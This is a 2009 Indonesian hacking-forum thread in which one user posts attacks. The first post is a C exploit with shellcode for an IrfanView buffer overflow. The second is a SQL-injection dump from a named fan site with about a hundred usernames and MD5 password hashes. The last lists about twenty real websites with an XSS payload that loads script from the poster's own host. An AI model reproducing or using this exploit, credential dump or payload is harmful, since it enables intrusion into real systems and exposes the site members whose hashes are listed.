Kumpulan Bugs

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate privilege, exploit, cover track, backdoors sampai mengamankan web


Forum rules
Membahas bugs, penetrasi, eksploitasi dan teknik mengamankan website - webserver. Sertakan PoC di sini agar member dapat mempelajarinya.

Re: Kumpulan Bugs

Post by Digital Cat » Wed Jul 22, 2009 3:19 pm

Irfan View 3.99 >> Local Stack Buffer Overflow

shellcode : metasploit


#include <stdio.h>
#include <stdlib.h>

#define SF "RO.iff"
#define OFFSET 2100

 /* Payload bytes that main() copies into the output buffer directly after the
  * 4-byte return address. The post attributes them to Metasploit; this program
  * treats them as an opaque byte string. The array's terminating NUL is
  * counted by sizeof() and is therefore copied as well. */
 char shellcode[]=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x37\x6a\x63"
"\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x41\x42\x32\x42\x41\x32"
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x38\x69\x69\x6c\x38"
"\x68\x41\x54\x77\x70\x57\x70\x75\x50\x6e\x6b\x41\x55\x55\x6c\x6e"
"\x6b\x43\x4c\x66\x65\x41\x68\x45\x51\x58\x6f\x4c\x4b\x50\x4f\x62"
"\x38\x6e\x6b\x41\x4f\x31\x30\x36\x61\x4a\x4b\x41\x59\x6c\x4b\x74"
"\x74\x6e\x6b\x44\x41\x4a\x4e\x47\x41\x4b\x70\x6f\x69\x6c\x6c\x4c"
"\x44\x4b\x70\x43\x44\x76\x67\x4b\x71\x4a\x6a\x66\x6d\x66\x61\x39"
"\x52\x5a\x4b\x4a\x54\x75\x6b\x62\x74\x56\x44\x73\x34\x41\x65\x4b"
"\x55\x4e\x6b\x73\x6f\x54\x64\x53\x31\x6a\x4b\x35\x36\x6c\x4b\x64"
"\x4c\x30\x4b\x6c\x4b\x73\x6f\x57\x6c\x75\x51\x6a\x4b\x6c\x4b\x37"
"\x6c\x6c\x4b\x77\x71\x68\x6b\x4c\x49\x71\x4c\x51\x34\x43\x34\x6b"
"\x73\x46\x51\x79\x50\x71\x74\x4c\x4b\x67\x30\x36\x50\x4c\x45\x4b"
"\x70\x62\x58\x74\x4c\x6c\x4b\x53\x70\x56\x6c\x4e\x6b\x34\x30\x47"
"\x6c\x4e\x4d\x6c\x4b\x70\x68\x37\x78\x58\x6b\x53\x39\x6c\x4b\x4f"
"\x70\x6c\x70\x53\x30\x43\x30\x73\x30\x6c\x4b\x42\x48\x77\x4c\x61"
"\x4f\x44\x71\x6b\x46\x73\x50\x72\x76\x6b\x39\x5a\x58\x6f\x73\x4f"
"\x30\x73\x4b\x56\x30\x31\x78\x61\x6e\x6a\x78\x4b\x52\x74\x33\x55"
"\x38\x4a\x38\x69\x6e\x6c\x4a\x54\x4e\x52\x77\x79\x6f\x79\x77\x42"
"\x43\x50\x61\x70\x6c\x41\x73\x64\x6e\x51\x75\x52\x58\x31\x75\x57"
"\x70\x63";

/* Leading part of the crafted IFF image, copied to offset 0 of the buffer.
 * The chunk tags "FORM", "ILBM", "BMHD" (first line) and "CMAP" (third line)
 * are visible as ASCII; the rest of the bytes are written verbatim and are not
 * interpreted by this program. Its terminating NUL is copied too (sizeof). */
char iff1[]=
"\x46\x4F\x52\x4D\x00\x01\x0B\x7E\x49\x4C\x42\x4D\x42\x4D\x48\x44"
"\x00\x00\x00\x14\x01\xFD\x01\xB6\x00\x00\x00\x00\x08\x00\x01\x00"
"\x00\x00\xC7\xC7\x01\xFD\x01\xB6\x43\x4D\x41\x50\x00\x00\x0C\x00"
"\x1B\x1B\x19\xFF\xFF\xFF\xBC\xD7\xEA\xEF\x64\x2E\x73\xA9\xD2\xD9"
"\xD9\xD9\x13\x6E\xB6\x00\x68\xB4\x70\x70\x70\xF0\x92\x6C\x2E\xCC"
"\xCC\xFA\xF2\xE6\x99\x99\x99\x50\x94\xC5\xF1\xE9\xE6\xF7\xAD\x32"
"\xAC\xB4\xB4\x4D\x4B\x48\xF0\xC9\xB4\xAB\x85\x38\xE0\xE9\xEF\xEC"
"\xE5\xDE\xEF\xB4\x98\x2E\x80\xBC\xE5\x98\x3A\x8C\x8C\x8C\xEF\xE0"
"\xD3\xA6\xC4\xD9\x33\x33\x33\x8C\xB6\xD5\xC6\xD5\xDD\xFA\xF7\xF3"
"\xFE\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x03\xFB\xEF\x3F\x78"
"\xE8\xFF\x00\xF8\xDF\x00\x03\x04\x10\x40\x41\xE7\x00\xEB\x00\x00"
"\xC0\xF4\x00\x01\x41\x56\xE7\x00\xDF\x00\x03\x04\x30\x40\xC7\xE7"
"\x00\xEA\x00\x00\x18\xF7\x00\x03\x03\xE0\x80\x5E\xE7\x00\xC1\x00"
"\xC1\x00\xC1\x00\xEB\xFF\x01\x7F\xE7\xF7\xFF\x03\xFC\xA7\x7E\x72"
"\xE8\xFF\x00\xF8\xDD\x00\x01\x01\x64\xE7\x00\xDF\x00\x00\x01\xFF"
"\x00\x01\x60\x80\xE8\x00\xEB\x00\x00\x80\xF6\x00\x03\x05\xC8\x81"
"\x6E\xE7\x00\xEB\x00\x01\x40\x10\xF7\x00\x03\x04\xA0\x40\x72\xE7"
"\x00\xC1\x00\xC1\x00\xC1\x00\xEB\xFF\x01\x3F\x87\xFF\xFF\x00\xDD"
"\xFC\xFF\x05\xEF\xF7\xFF\xE7\x9E\x66\xE8\xFF\x00\xF8\xEA\x00\x04"
"\x60\x00\xA0\x22\x01\xFE\x00\x07\x20\x50\x08\x00\x10\x01\x09\x80"
"\xE8\x00\xEC\x00\x05\x01\x20\x69\x80\xE0\x63\xFF\x03\x04\x01\x80"
"\x60\x70\x18\xFE\x00\x01\xA8\x80\xE8\x00\xEA\x00\x04\x68\x00\xA0"
"\x22\x01\xFE\x00\x07\x20\x50\x08\x04\x14\xA1\x89\x80\xE8\x00\xEC"
"\x00\x05\x01\x00\x18\x80\xA0\x40\xFF\x01\x09\x00\x80\x20\x40\x00"
"\x06\x04\x80\xA0\x80\xE8\x00\xC1\x00\xC1\x00\xC1\x00\xEC\xFF\x10"
"\xFE\x3F\x81\x7E\x4D\x97\x38\x73\xB9\xFA\x4F\x2F\xD3\xFF\xF1\x0E"
"\x67\xE8\xFF\x00\xF8\xEA\x00\x00\x04\xFF\x02\x00\x08\xFF\x00\x08"
"\x40\x00\x01\x00\x02\x00\x0A\x01\x60\xE7\x00\xEB\x00\x0F\x02\x4A"
"\xA2\xA0\x48\xC3\x04\x02\x20\xA1\x54\x2A\x00\x02\x20\xF0\xE7\x00"
"\xEC\x00\x10\x01\xC0\xCE\x83\xB2\xC8\xC7\x0C\x42\x00\xA1\xD0\x6E"
"\x04\x0A\xF1\xF8\xE7\x00\xEB\x00\x05\x23\xFB\xC2\xE1\xE7\x83\xFF"
"\x87\x07\xC7\xF1\x78\x7A\x06\x00\x20\xF0\xE7\x00\xC1\x00\xC1\x41";

 /* First filler block, copied directly after iff1: 0x58 ('X') bytes, with
  * 0x48 as the last byte. Like the other arrays, its terminating NUL is
  * included by sizeof() and copied. sizeof(iff2) is also (counted twice) part
  * of the allocation size and the fwrite length in main(). */
 char iff2[]=
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x48";

 /* Second filler block, copied directly after iff2: 0x58 ('X') bytes followed
  * by 20 bytes of 0x41 ('A'). main() later writes the return address and
  * shellcode from OFFSET onward regardless of where this block ends; by my
  * count iff1+iff2+iff3 run a few bytes past OFFSET, so the tail of this
  * block is overwritten — verify against the sizes if it matters. */
 char iff3[]=
 "\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41";

 /* Entry point: assembles the crafted image in a heap buffer and writes it to
  * the file named by SF. Buffer layout: iff1 at 0, then iff2, then iff3;
  * then, starting at OFFSET, the 4-byte retaddress followed by shellcode.
  * Returns 0. If fopen() fails it prints "error" and calls exit(0) (the
  * buffer is leaked). memcpy() is used without #include <string.h>, so it is
  * implicitly declared here. */
 int main()
{
	FILE* k;
	char *buffer;
	int offset=0;
	unsigned int retaddress=0x7C8369F0;
    /* Precedence pitfall: the cast binds tighter than '+', so the trailing
     * +4+1 is added to the returned pointer rather than to the allocation
     * size; the first 5 bytes of the block are skipped. The result is never
     * checked for NULL. */
    buffer=(char *)malloc(OFFSET+sizeof(iff2)+sizeof(iff2)+sizeof(iff3))+4+1;
    
     if((k=fopen(SF,"wb"))==NULL)
   { printf("error"); exit(0); } 

	memcpy(buffer,iff1,sizeof(iff1));
	offset=sizeof(iff1);
	memcpy(buffer+offset,iff2,sizeof(iff2)); 		
    offset+=sizeof(iff2);
	memcpy(buffer+offset,iff3,sizeof(iff3));
	offset+=sizeof(iff3);
	/* The running offset is discarded: the next two copies land at OFFSET
	 * regardless of how long iff1..iff3 were. */
	offset=0;
	offset=OFFSET;
	memcpy(buffer+offset,&retaddress,4);
	offset+=4;
	memcpy(buffer+offset,shellcode,sizeof(shellcode));
	/* The write length is an independent expression (iff2 counted twice,
	 * iff1 not at all). By my count it runs past the end of shellcode, so the
	 * tail of the file is uninitialised heap memory — verify. fclose()'s
	 * return value is not checked and buffer is never freed. */
	fwrite( buffer, 1,sizeof(iff2)+sizeof(iff2)+sizeof(iff3)+1, k );
   fclose(k);
	return 0;	
}
Terima Kasih….



Re: Kumpulan Bugs

Post by Digital Cat » Thu Jul 23, 2009 4:04 pm

Bugs : sugababes.com

web Site / Link : http://sugababes.com/show-detail.php?id=27

Detail :


Server = Apache/2.2.0 (Fedora)
    Version = 4.1.12
    Powered by = PHP/5.1.2
    Current User = sugababes@vv44web01
    Current Database = sugababes
    Supports Union = yes
    Union Columns = 8
Table : phpbb_users


    phpbb_users
    diary
    news
Kolom : Table phpbb_users


    username
    user_email
    user_icq
    user_id
    user_level
    user_password
Table : phpbb_users
username:user_password:


mrs t:2d3a3249cdc7b4663db44d4ca8252d75:
Dannie Boy:182a1e726ac1c8ae851194cea6df0393:
Blazin Babe:4914964d52599ee3e77d68d578572c37:
orli:ffb4a4d0940fde9b0d2d7e9ea0017140:
Gunnar is goood:854694dc83b7fc6650f62fdbff1a52e6:
MissMisr:25d55ad283aa400af464c76d713c07ad:
ange2003:f9e1f3ae15198f819fbc3449479401bf:
Saltybabe:2507490e53b252c2f593ee4e9da9129e:
Leon_da_sexgod:f30532000a806003ddd6aa7771223b03:
KiraKatz:95884b5232ea01d055768613fc84f242:
tarynma:08017f86d47d1b641716b14e4c48ff35:
pinkky_1:d5df69da529ce3b838a5e0e0780a086e:
sugababe91:7fde47bf866ce9a846dc6d3ba7383049:
James Dean:8e3df1a989428ff469c83a35884bd4a1:
Regan:c0f800d7ffe20d4e44225275e68fda56:
qwertqwert:a384b6463fc216a5f8ecb6670f86456a:
beep:5f4dcc3b5aa765d61d8327deb882cf99:
butcher:c58498c44c94dcdaab1d75b1f4688707:
giomla:e2818f83e17dc0d8cba0bc156a8fb3ea:
Peter_p:e7efda40b1c94805070cd9bf9638ae27:
=: Roy :=:84e6c0471bc15c3a3a03153c6d28d047:
joker666:1b1c2ebe17e9f81469f267672e60933f:
Jack Daniel:0911054d8ad47cc256400031197f3e97:
minisimsam:f01e0d7992a3b7748538d02291b0beae:
SHREK:1a909a26169c230d006cb464fbbb35a3:
Millie:c51e7a23a59ef8d76892f207b517eaf0:
rich345:e7f4f8bd246c235418280d1f124e14f0:
Powerpuff_girl1:babc2860c134a097abd7b53f2a2a4193:
Miss Naughty:5d41402abc4b2a76b9719d911017c592:
jdauris:098796e75f06a07b6562d28805973870:
rem:5cadb523cb6909f92350f70f124adfb8:
Goro FL:00bfc8c729f5d4d529a412b12c58ddd2:
egla:7563df3e9a39d05bf34f33ca66c0e7b3:
keisha2003:29ddc288099264c17b07baf44d3f0adc:
Jckie:3d1e3077753f8fb768794c6a8331c493:
sexy-angel:d73686beae2b4fc74f8769280c94b46b:
threeb:32f6ede63b1ebcf1a9cb25edf5124e9c:
Steph 2003:57c7c2ddc26eb099d164044b1517c365:
nabel:d98c2a265e34013a60c84e8fb30f22ca:
js003e5537-4:47bc17dc1a2f164967f55325d866c75c:
jpaterson:3c268f9e57f72a904c02b735f357b761:
husky13:67afc88feaaa65c73fce9f79669a2127:
moehrle:3f42d55a1cccf1d96eb5a8e4c14ce4e4:
baby_blue:153a4b0a56d423c73a3c5c6f30a5e24e:
lori_1:3a9fa4655e6acd4ad1da3a5bc23f09a5:
dellihc:5e0fb1614a5f8e9ee42ba106302bb045:
sugarandspice5:aa6e1bacb3bedfec8b52420c1a8a6f51:
jdl87:08eccfc22ca5791286ebb537e0f15b8c:
katforsythe:275639052a9aa011ec2b3eba62c9aba3:
hannahgosney:198a8c20a31ae4fb9271efe60075609a:
JENNA  ANNABLE:6db38c85b66a565321f93357ff04fbdf:
harpreet:81a7b0619dde6aa8963033d7e34f3afb:
sugaboi:757550ecd97318ce9a1867bb96d026e5:
Summersmum:d39e7f80a9e4b67eebf53ca8410ee3ff:
dollars:ed7a163e90e0a798e145c8300cb582b8:
Derek L.Newman:439fd05bb7ff01f7673b2b073a1a4c4b:
guyperry:1174889cb6243d80d886eed8b8100a7c:
head_like:2a826adaf6e46ec11bab6f85f9402c53:
hazie:6de25a89f67a276da5f911ed789d0290:
clickrick:96468a0a3afaa8df9f9ac31cb94dbded:
gatouss:4a158576ff6319c86298de8203a7d159:
rxy230189:5eefc3c511dfcdf141d56678074b87a9:
lis:dc5a4e9caf9a70b6fe736090eb2016d8:
dimian:74cc8956e5a3ce87100f2f58e1396feb:
sjynstree:9103fb99bafb48705b35aabf0ceb1636:
RachHeidi:ad2106f2e4b616a289079eeb6a275d23:
bastardo:436dc8ee5312315758115fff0bc3a341:
sk8er_girl:d7428a7f7fbc8abb1df0d32507cc1565:
broxi:1174889cb6243d80d886eed8b8100a7c:
Jeshua:ce0e0023456351a42753a8094d7e5f0f:
adam lee:f8b13e38e26fc267b26f0c903b3f9f23:
suga_ellen:15cfacecb094e41225286428a49de010:
goovenon:bdf76bdd545feac99d636d011b81dc1d:
BrideMC:e1c565c5b1da2a3b81712427d06f5b34:
timducky:1e4ba061f03738f6350ce94051619d6c:
Littledevil_02:73ebfd0f8a23f0348989b520f2f41caa:
sweden_babe:21f9f292ef3f52e4d6aac3497ca1bb1d:
SassieSugababe:9d6f0e7faa62a99f5e5d4ea6e9d73666:
Burner2106:6b600db7ebc902f84a89ba680117975c:
nanamew:b9bf9b80051834fc8f6e9c20247cc282:
jopaton:613fbbc60d27e1aada1422d0ef3b27a2:
Molly Jean:a0bb756fef4053e66efd7a0629f562c7:
pasjekoel:ac0a8261e48b485b1a5ac98066ba2578:
bruttan:05b972dcf28374406d13e879724bfe3b:
Napp:301d43950a0f573f236a39038be71fe6:
bartkenter:fe86b268f412e57f83fcfd2b5561eac1:
Hugh:71fb1571844dff3db77ec2d950288b1b:
missismusic:fabb1d474de552e8301d8f5f7e637ef8:
dale:5f3c73f334928ade199125381f726892:
Kriz:b5f87a623929fd3b5ac265c888f1a215:
leezy87:8bc5b3285e2ac74b93c3ea6d7b0511d9:
reyon:757550ecd97318ce9a1867bb96d026e5:
Lobbie:9c10669263dac342426c90e0d711ef66:
edel:1038def6221874fb7208dff6349c21ef:
loopylass123:3fcf9ae132977f7ad2d4c9c58abffad0:
lees_babe:6988ec3aba1eaddf2435141bf10487ca:
Doll:73ebfd0f8a23f0348989b520f2f41caa:
MissBurnzzz:2b1b3eb12b8be71ecf1c42366a6c84da:
eb001d0067:e68b2892860a18086483cc1e4d0089e9:
kacklea:f78f2477e949bee2d12a2c540fb6084f:
Terima Kasih...



Re: Kumpulan Bugs

Post by Digital Cat » Thu Jul 23, 2009 4:42 pm

Bugs : Yahoo Mexico Image


>> Lihat Lebih Jelas <<

Lihat Web Site :

[url=htpp://%20http://mx.autos.yahoo.com/]>> Klik untuk melihat Web Site Victim <<[/url]

Bugs terdapat pada link di yahoo

Kode :


http://mx.autos.yahoo.com/newcars/index.php?
Tampilannya :


>> Lihat Lebih Jelas <<

Lihat Tampilan Bugs : >> Klik untuk melihat tampilannya <<

Terima Kasih...



Re: Kumpulan Bugs

Post by Digital Cat » Thu Jul 23, 2009 5:46 pm


Bugs : www.re.camcom.it Camera di Commercio Reggio Emilia

Link : RicercaView.jsp


>> Klik untuk lihat lebih jelas <<

Tampilan Bugs :


>> Klik untuk lihat lebih jelas <<

Lihat Tampilannya :

>> Klik Lihat Tampilannya <<

Terima Kasih...



Re: Kumpulan Bugs

Post by Digital Cat » Thu Jul 23, 2009 6:36 pm

Bugs : latest.php

Tampilan :

Web Site : www.scodz.com

Link : /dstats/twatch/latest.php


>> Klik untuk lihat gambar lebih jelas <<

Lihat Tampilan Web Site Bugs :

>> Klik untuk melihat Web Site Bugs <<

Selain link diatas terdapat juga pada link di bawah ini :


www.scodz.com/dstats/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.rakosszentmihaly.hu/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.araburban.net/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.pragmatick.de/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.ealmahd.gov.sa/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

bulwindoors.com/~bulwindo/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.brandongevallen.nl/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.plan.sk/www-plan-stats/TraceWatch/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

path3.ca/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

park.zc.bz/02/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.strzelecki.org/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.judohk.cz/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

micromin.net/test/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.fantasyservice.com.ar/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.fjear.nl/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.eisenbahnen.at/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.chiroinzet.be/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.ggmc.org/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.willemsena.be/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

www.willemsenzwembaden.be/twatch/latest.php?ip="><%2Fform><script+src%3Dhttp%3A%2F%2Fdigitalcat.fileave.com/digitalcat.js>

